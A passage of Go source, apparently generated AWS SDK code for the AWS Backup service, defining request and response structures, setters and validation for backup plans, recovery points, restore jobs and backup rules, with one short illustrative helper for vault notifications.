// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *PlansListMember) SetBackupPlanArn(v string) *PlansListMember {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *PlansListMember) SetBackupPlanId(v string) *PlansListMember {
s.BackupPlanId = &v
return s
}
// SetBackupPlanName sets the BackupPlanName field's value.
func (s *PlansListMember) SetBackupPlanName(v string) *PlansListMember {
s.BackupPlanName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *PlansListMember) SetCreationDate(v time.Time) *PlansListMember {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *PlansListMember) SetCreatorRequestId(v string) *PlansListMember {
s.CreatorRequestId = &v
return s
}
// SetDeletionDate sets the DeletionDate field's value.
func (s *PlansListMember) SetDeletionDate(v time.Time) *PlansListMember {
s.DeletionDate = &v
return s
}
// SetLastExecutionDate sets the LastExecutionDate field's value.
func (s *PlansListMember) SetLastExecutionDate(v time.Time) *PlansListMember {
s.LastExecutionDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *PlansListMember) SetVersionId(v string) *PlansListMember {
s.VersionId = &v
return s
}
// A structure that contains information about a backed-up resource.
type ProtectedResource struct {
_ struct{} `type:"structure"`
// The date and time a resource was last backed up, in Unix format and Coordinated
// Universal Time (UTC). The value of LastBackupTime is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
LastBackupTime *time.Time `type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource; for example, an Amazon Elastic Block Store (Amazon
// EBS) volume or an Amazon Relational Database Service (Amazon RDS) database.
// For VSS Windows backups, the only supported resource type is Amazon EC2.
ResourceType *string `type:"string"`
}
// String returns the string representation
func (s ProtectedResource) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ProtectedResource) GoString() string {
return s.String()
}
// SetLastBackupTime sets the LastBackupTime field's value.
func (s *ProtectedResource) SetLastBackupTime(v time.Time) *ProtectedResource {
s.LastBackupTime = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *ProtectedResource) SetResourceArn(v string) *ProtectedResource {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *ProtectedResource) SetResourceType(v string) *ProtectedResource {
s.ResourceType = &v
return s
}
type PutBackupVaultAccessPolicyInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// The backup vault access policy document in JSON format.
Policy *string `type:"string"`
}
// String returns the string representation
func (s PutBackupVaultAccessPolicyInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PutBackupVaultAccessPolicyInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *PutBackupVaultAccessPolicyInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "PutBackupVaultAccessPolicyInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *PutBackupVaultAccessPolicyInput) SetBackupVaultName(v string) *PutBackupVaultAccessPolicyInput {
s.BackupVaultName = &v
return s
}
// SetPolicy sets the Policy field's value.
func (s *PutBackupVaultAccessPolicyInput) SetPolicy(v string) *PutBackupVaultAccessPolicyInput {
s.Policy = &v
return s
}
type PutBackupVaultAccessPolicyOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s PutBackupVaultAccessPolicyOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PutBackupVaultAccessPolicyOutput) GoString() string {
return s.String()
}
type PutBackupVaultNotificationsInput struct {
_ struct{} `type:"structure"`
// An array of events that indicate the status of jobs to back up resources
// to the backup vault.
//
// BackupVaultEvents is a required field
BackupVaultEvents []*string `type:"list" required:"true"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// The Amazon Resource Name (ARN) that specifies the topic for a backup vault’s
// events; for example, arn:aws:sns:us-west-2:111122223333:MyVaultTopic.
//
// SNSTopicArn is a required field
SNSTopicArn *string `type:"string" required:"true"`
}
// String returns the string representation
func (s PutBackupVaultNotificationsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PutBackupVaultNotificationsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *PutBackupVaultNotificationsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "PutBackupVaultNotificationsInput"}
if s.BackupVaultEvents == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultEvents"))
}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.SNSTopicArn == nil {
invalidParams.Add(request.NewErrParamRequired("SNSTopicArn"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultEvents sets the BackupVaultEvents field's value.
func (s *PutBackupVaultNotificationsInput) SetBackupVaultEvents(v []*string) *PutBackupVaultNotificationsInput {
s.BackupVaultEvents = v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *PutBackupVaultNotificationsInput) SetBackupVaultName(v string) *PutBackupVaultNotificationsInput {
s.BackupVaultName = &v
return s
}
// SetSNSTopicArn sets the SNSTopicArn field's value.
func (s *PutBackupVaultNotificationsInput) SetSNSTopicArn(v string) *PutBackupVaultNotificationsInput {
s.SNSTopicArn = &v
return s
}
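// Illustrative sketch (not generated API surface): subscribing a vault to an
// SNS topic for job-status events. The topic ARN and vault name are
// hypothetical, and "BACKUP_JOB_COMPLETED" is assumed to be a valid
// BackupVaultEvent enum value.
func examplePutBackupVaultNotificationsInput() (*PutBackupVaultNotificationsInput, error) {
	completed := "BACKUP_JOB_COMPLETED"
	input := (&PutBackupVaultNotificationsInput{}).
		SetBackupVaultEvents([]*string{&completed}).
		SetBackupVaultName("example-vault").
		SetSNSTopicArn("arn:aws:sns:us-west-2:111122223333:MyVaultTopic")
	if err := input.Validate(); err != nil {
		return nil, err
	}
	return input, nil
}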
type PutBackupVaultNotificationsOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s PutBackupVaultNotificationsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PutBackupVaultNotificationsOutput) GoString() string {
return s.String()
}
// Contains detailed information about the recovery points stored in a backup
// vault.
type RecoveryPointByBackupVault struct {
_ struct{} `type:"structure"`
// The size, in bytes, of a backup.
BackupSizeInBytes *int64 `type:"long"`
// An ARN that uniquely identifies a backup vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// A CalculatedLifecycle object containing DeleteAt and MoveToColdStorageAt
// timestamps.
CalculatedLifecycle *CalculatedLifecycle `type:"structure"`
// The date and time a job to restore a recovery point is completed, in Unix
// format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Contains identifying information about the creation of a recovery point,
// including the BackupPlanArn, BackupPlanId, BackupPlanVersion, and BackupRuleId
// of the backup plan that is used to create it.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time a recovery point is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// A Boolean value that is returned as TRUE if the specified recovery point
// is encrypted, or FALSE if the recovery point is not encrypted.
IsEncrypted *bool `type:"boolean"`
// The date and time a recovery point was last restored, in Unix format and
// Coordinated Universal Time (UTC). The value of LastRestoreTime is accurate
// to milliseconds. For example, the value 1516925490.087 represents Friday,
// January 26, 2018 12:11:30.087 AM.
LastRestoreTime *time.Time `type:"timestamp"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource saved as a recovery point; for example, an Amazon
// Elastic Block Store (Amazon EBS) volume or an Amazon Relational Database
// Service (Amazon RDS) database. For VSS Windows backups, the only supported
// resource type is Amazon EC2.
ResourceType *string `type:"string"`
// The backup vault where the recovery point was originally copied from. If
// the recovery point is restored to the same account, this value will be null.
SourceBackupVaultArn *string `type:"string"`
// A status code specifying the state of the recovery point.
Status *string `type:"string" enum:"RecoveryPointStatus"`
}
// String returns the string representation
func (s RecoveryPointByBackupVault) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RecoveryPointByBackupVault) GoString() string {
return s.String()
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *RecoveryPointByBackupVault) SetBackupSizeInBytes(v int64) *RecoveryPointByBackupVault {
s.BackupSizeInBytes = &v
return s
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *RecoveryPointByBackupVault) SetBackupVaultArn(v string) *RecoveryPointByBackupVault {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *RecoveryPointByBackupVault) SetBackupVaultName(v string) *RecoveryPointByBackupVault {
s.BackupVaultName = &v
return s
}
// SetCalculatedLifecycle sets the CalculatedLifecycle field's value.
func (s *RecoveryPointByBackupVault) SetCalculatedLifecycle(v *CalculatedLifecycle) *RecoveryPointByBackupVault {
s.CalculatedLifecycle = v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *RecoveryPointByBackupVault) SetCompletionDate(v time.Time) *RecoveryPointByBackupVault {
s.CompletionDate = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *RecoveryPointByBackupVault) SetCreatedBy(v *RecoveryPointCreator) *RecoveryPointByBackupVault {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *RecoveryPointByBackupVault) SetCreationDate(v time.Time) *RecoveryPointByBackupVault {
s.CreationDate = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *RecoveryPointByBackupVault) SetEncryptionKeyArn(v string) *RecoveryPointByBackupVault {
s.EncryptionKeyArn = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *RecoveryPointByBackupVault) SetIamRoleArn(v string) *RecoveryPointByBackupVault {
s.IamRoleArn = &v
return s
}
// SetIsEncrypted sets the IsEncrypted field's value.
func (s *RecoveryPointByBackupVault) SetIsEncrypted(v bool) *RecoveryPointByBackupVault {
s.IsEncrypted = &v
return s
}
// SetLastRestoreTime sets the LastRestoreTime field's value.
func (s *RecoveryPointByBackupVault) SetLastRestoreTime(v time.Time) *RecoveryPointByBackupVault {
s.LastRestoreTime = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *RecoveryPointByBackupVault) SetLifecycle(v *Lifecycle) *RecoveryPointByBackupVault {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *RecoveryPointByBackupVault) SetRecoveryPointArn(v string) *RecoveryPointByBackupVault {
s.RecoveryPointArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *RecoveryPointByBackupVault) SetResourceArn(v string) *RecoveryPointByBackupVault {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *RecoveryPointByBackupVault) SetResourceType(v string) *RecoveryPointByBackupVault {
s.ResourceType = &v
return s
}
// SetSourceBackupVaultArn sets the SourceBackupVaultArn field's value.
func (s *RecoveryPointByBackupVault) SetSourceBackupVaultArn(v string) *RecoveryPointByBackupVault {
s.SourceBackupVaultArn = &v
return s
}
// SetStatus sets the Status field's value.
func (s *RecoveryPointByBackupVault) SetStatus(v string) *RecoveryPointByBackupVault {
s.Status = &v
return s
}
// Contains detailed information about a saved recovery point.
type RecoveryPointByResource struct {
_ struct{} `type:"structure"`
// The size, in bytes, of a backup.
BackupSizeBytes *int64 `type:"long"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// The date and time a recovery point is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// A status code specifying the state of the recovery point.
Status *string `type:"string" enum:"RecoveryPointStatus"`
}
// String returns the string representation
func (s RecoveryPointByResource) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RecoveryPointByResource) GoString() string {
return s.String()
}
// SetBackupSizeBytes sets the BackupSizeBytes field's value.
func (s *RecoveryPointByResource) SetBackupSizeBytes(v int64) *RecoveryPointByResource {
s.BackupSizeBytes = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *RecoveryPointByResource) SetBackupVaultName(v string) *RecoveryPointByResource {
s.BackupVaultName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *RecoveryPointByResource) SetCreationDate(v time.Time) *RecoveryPointByResource {
s.CreationDate = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *RecoveryPointByResource) SetEncryptionKeyArn(v string) *RecoveryPointByResource {
s.EncryptionKeyArn = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *RecoveryPointByResource) SetRecoveryPointArn(v string) *RecoveryPointByResource {
s.RecoveryPointArn = &v
return s
}
// SetStatus sets the Status field's value.
func (s *RecoveryPointByResource) SetStatus(v string) *RecoveryPointByResource {
s.Status = &v
return s
}
// Contains information about the backup plan and rule that AWS Backup used
// to initiate the recovery point backup.
type RecoveryPointCreator struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// Version IDs are unique, randomly generated, Unicode, UTF-8 encoded strings
// that are at most 1,024 bytes long. They cannot be edited.
BackupPlanVersion *string `type:"string"`
// Uniquely identifies a rule used to schedule the backup of a selection of
// resources.
BackupRuleId *string `type:"string"`
}
// String returns the string representation
func (s RecoveryPointCreator) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RecoveryPointCreator) GoString() string {
return s.String()
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *RecoveryPointCreator) SetBackupPlanArn(v string) *RecoveryPointCreator {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *RecoveryPointCreator) SetBackupPlanId(v string) *RecoveryPointCreator {
s.BackupPlanId = &v
return s
}
// SetBackupPlanVersion sets the BackupPlanVersion field's value.
func (s *RecoveryPointCreator) SetBackupPlanVersion(v string) *RecoveryPointCreator {
s.BackupPlanVersion = &v
return s
}
// SetBackupRuleId sets the BackupRuleId field's value.
func (s *RecoveryPointCreator) SetBackupRuleId(v string) *RecoveryPointCreator {
s.BackupRuleId = &v
return s
}
// A resource that is required for the action doesn't exist.
type ResourceNotFoundException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s ResourceNotFoundException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ResourceNotFoundException) GoString() string {
return s.String()
}
func newErrorResourceNotFoundException(v protocol.ResponseMetadata) error {
return &ResourceNotFoundException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *ResourceNotFoundException) Code() string {
return "ResourceNotFoundException"
}
// Message returns the exception's message.
func (s *ResourceNotFoundException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *ResourceNotFoundException) OrigErr() error {
return nil
}
func (s *ResourceNotFoundException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// StatusCode returns the HTTP status code for the request's response error.
func (s *ResourceNotFoundException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *ResourceNotFoundException) RequestID() string {
return s.RespMetadata.RequestID
}
// Contains metadata about a restore job.
type RestoreJobsListMember struct {
_ struct{} `type:"structure"`
// The account ID that owns the restore job.
AccountId *string `type:"string"`
// The size, in bytes, of the restored resource.
BackupSizeInBytes *int64 `type:"long"`
// The date and time a job to restore a recovery point is completed, in Unix
// format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the resource type.
CreatedResourceArn *string `type:"string"`
// The date and time a restore job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The amount of time in minutes that a job restoring a recovery point is expected
// to take.
ExpectedCompletionTimeMinutes *int64 `type:"long"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// Contains an estimated percentage complete of a job at the time the job status
// was queried.
PercentDone *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// The resource type of the listed restore jobs; for example, an Amazon Elastic
// Block Store (Amazon EBS) volume or an Amazon Relational Database Service
// (Amazon RDS) database. For VSS Windows backups, the only supported resource
// type is Amazon EC2.
ResourceType *string `type:"string"`
// Uniquely identifies the job that restores a recovery point.
RestoreJobId *string `type:"string"`
// A status code specifying the state of the job initiated by AWS Backup to
// restore a recovery point.
Status *string `type:"string" enum:"RestoreJobStatus"`
// A detailed message explaining the status of the job to restore a recovery
// point.
StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s RestoreJobsListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RestoreJobsListMember) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *RestoreJobsListMember) SetAccountId(v string) *RestoreJobsListMember {
s.AccountId = &v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *RestoreJobsListMember) SetBackupSizeInBytes(v int64) *RestoreJobsListMember {
s.BackupSizeInBytes = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *RestoreJobsListMember) SetCompletionDate(v time.Time) *RestoreJobsListMember {
s.CompletionDate = &v
return s
}
// SetCreatedResourceArn sets the CreatedResourceArn field's value.
func (s *RestoreJobsListMember) SetCreatedResourceArn(v string) *RestoreJobsListMember {
s.CreatedResourceArn = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *RestoreJobsListMember) SetCreationDate(v time.Time) *RestoreJobsListMember {
s.CreationDate = &v
return s
}
// SetExpectedCompletionTimeMinutes sets the ExpectedCompletionTimeMinutes field's value.
func (s *RestoreJobsListMember) SetExpectedCompletionTimeMinutes(v int64) *RestoreJobsListMember {
s.ExpectedCompletionTimeMinutes = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *RestoreJobsListMember) SetIamRoleArn(v string) *RestoreJobsListMember {
s.IamRoleArn = &v
return s
}
// SetPercentDone sets the PercentDone field's value.
func (s *RestoreJobsListMember) SetPercentDone(v string) *RestoreJobsListMember {
s.PercentDone = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *RestoreJobsListMember) SetRecoveryPointArn(v string) *RestoreJobsListMember {
s.RecoveryPointArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *RestoreJobsListMember) SetResourceType(v string) *RestoreJobsListMember {
s.ResourceType = &v
return s
}
// SetRestoreJobId sets the RestoreJobId field's value.
func (s *RestoreJobsListMember) SetRestoreJobId(v string) *RestoreJobsListMember {
s.RestoreJobId = &v
return s
}
// SetStatus sets the Status field's value.
func (s *RestoreJobsListMember) SetStatus(v string) *RestoreJobsListMember {
s.Status = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *RestoreJobsListMember) SetStatusMessage(v string) *RestoreJobsListMember {
s.StatusMessage = &v
return s
}
// Specifies a scheduled task used to back up a selection of resources.
type Rule struct {
_ struct{} `type:"structure"`
// A value in minutes after a backup job is successfully started before it must
// be completed or it will be canceled by AWS Backup. This value is optional.
CompletionWindowMinutes *int64 `type:"long"`
// An array of CopyAction objects, which contains the details of the copy operation.
CopyActions []*CopyAction `type:"list"`
// Specifies whether AWS Backup creates continuous backups. True causes AWS
// Backup to create continuous backups capable of point-in-time restore (PITR).
// False (or not specified) causes AWS Backup to create snapshot backups.
EnableContinuousBackup *bool `type:"boolean"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An array of key-value pair strings that are assigned to resources that are
// associated with this rule when restored from backup.
RecoveryPointTags map[string]*string `type:"map" sensitive:"true"`
// Uniquely identifies a rule that is used to schedule the backup of a selection
// of resources.
RuleId *string `type:"string"`
// An optional display name for a backup rule.
//
// RuleName is a required field
RuleName *string `type:"string" required:"true"`
// A CRON expression specifying when AWS Backup initiates a backup job. For
// more information about cron expressions, see Schedule Expressions for Rules
// (https://docs.aws.amazon.com/AmazonCloudWatch/latest/events/ScheduledEvents.html)
// in the Amazon CloudWatch Events User Guide. Prior to specifying a value
// for this parameter, we recommend testing your cron expression using one of
// the many available cron generator and testing tools.
ScheduleExpression *string `type:"string"`
// A value in minutes after a backup is scheduled before a job will be canceled
// if it doesn't start successfully. This value is optional.
StartWindowMinutes *int64 `type:"long"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// TargetBackupVaultName is a required field
TargetBackupVaultName *string `type:"string" required:"true"`
}
// String returns the string representation
func (s Rule) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Rule) GoString() string {
return s.String()
}
// SetCompletionWindowMinutes sets the CompletionWindowMinutes field's value.
func (s *Rule) SetCompletionWindowMinutes(v int64) *Rule {
s.CompletionWindowMinutes = &v
return s
}
// SetCopyActions sets the CopyActions field's value.
func (s *Rule) SetCopyActions(v []*CopyAction) *Rule {
s.CopyActions = v
return s
}
// SetEnableContinuousBackup sets the EnableContinuousBackup field's value.
func (s *Rule) SetEnableContinuousBackup(v bool) *Rule {
s.EnableContinuousBackup = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *Rule) SetLifecycle(v *Lifecycle) *Rule {
s.Lifecycle = v
return s
}
// SetRecoveryPointTags sets the RecoveryPointTags field's value.
func (s *Rule) SetRecoveryPointTags(v map[string]*string) *Rule {
s.RecoveryPointTags = v
return s
}
// SetRuleId sets the RuleId field's value.
func (s *Rule) SetRuleId(v string) *Rule {
s.RuleId = &v
return s
}
// SetRuleName sets the RuleName field's value.
func (s *Rule) SetRuleName(v string) *Rule {
s.RuleName = &v
return s
}
// SetScheduleExpression sets the ScheduleExpression field's value.
func (s *Rule) SetScheduleExpression(v string) *Rule {
s.ScheduleExpression = &v
return s
}
// SetStartWindowMinutes sets the StartWindowMinutes field's value.
func (s *Rule) SetStartWindowMinutes(v int64) *Rule {
s.StartWindowMinutes = &v
return s
}
// SetTargetBackupVaultName sets the TargetBackupVaultName field's value.
func (s *Rule) SetTargetBackupVaultName(v string) *Rule {
s.TargetBackupVaultName = &v
return s
}
// Specifies a scheduled task used to back up a selection of resources.
type RuleInput struct {
_ struct{} `type:"structure"`
// A value in minutes after a backup job is successfully started before it must
// be completed or it will be canceled by AWS Backup. This value is optional.
CompletionWindowMinutes *int64 `type:"long"`
// An array of CopyAction objects, which contains the details of the copy operation.
CopyActions []*CopyAction `type:"list"`
// Specifies whether AWS Backup creates continuous backups. True causes AWS
// Backup to create continuous backups capable of point-in-time restore (PITR).
// False (or not specified) causes AWS Backup to create snapshot backups.
EnableContinuousBackup *bool `type:"boolean"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup will transition and expire backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// To help organize your resources, you can assign your own metadata to the
// resources that you create. Each tag is a key-value pair.
RecoveryPointTags map[string]*string `type:"map" sensitive:"true"`
// An optional display name for a backup rule.
//
// RuleName is a required field
RuleName *string `type:"string" required:"true"`
// A CRON expression specifying when AWS Backup initiates a backup job.
ScheduleExpression *string `type:"string"`
// A value in minutes after a backup is scheduled before a job will be canceled
// if it doesn't start successfully. This value is optional.
StartWindowMinutes *int64 `type:"long"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// TargetBackupVaultName is a required field
TargetBackupVaultName *string `type:"string" required:"true"`
}
// String returns the string representation
func (s RuleInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s RuleInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *RuleInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "RuleInput"}
if s.RuleName == nil {
invalidParams.Add(request.NewErrParamRequired("RuleName"))
}
if s.TargetBackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("TargetBackupVaultName"))
}
if s.CopyActions != nil {
for i, v := range s.CopyActions {
if v == nil {
continue
}
if err := v.Validate(); err != nil {
invalidParams.AddNested(fmt.Sprintf("%s[%v]", "CopyActions", i), err.(request.ErrInvalidParams))
}
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetCompletionWindowMinutes sets the CompletionWindowMinutes field's value.
func (s *RuleInput) SetCompletionWindowMinutes(v int64) *RuleInput {
s.CompletionWindowMinutes = &v
return s
}
// SetCopyActions sets the CopyActions field's value.
func (s *RuleInput) SetCopyActions(v []*CopyAction) *RuleInput {
s.CopyActions = v
return s
}
// SetEnableContinuousBackup sets the EnableContinuousBackup field's value.
func (s *RuleInput) SetEnableContinuousBackup(v bool) *RuleInput {
s.EnableContinuousBackup = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *RuleInput) SetLifecycle(v *Lifecycle) *RuleInput {
s.Lifecycle = v
return s
}
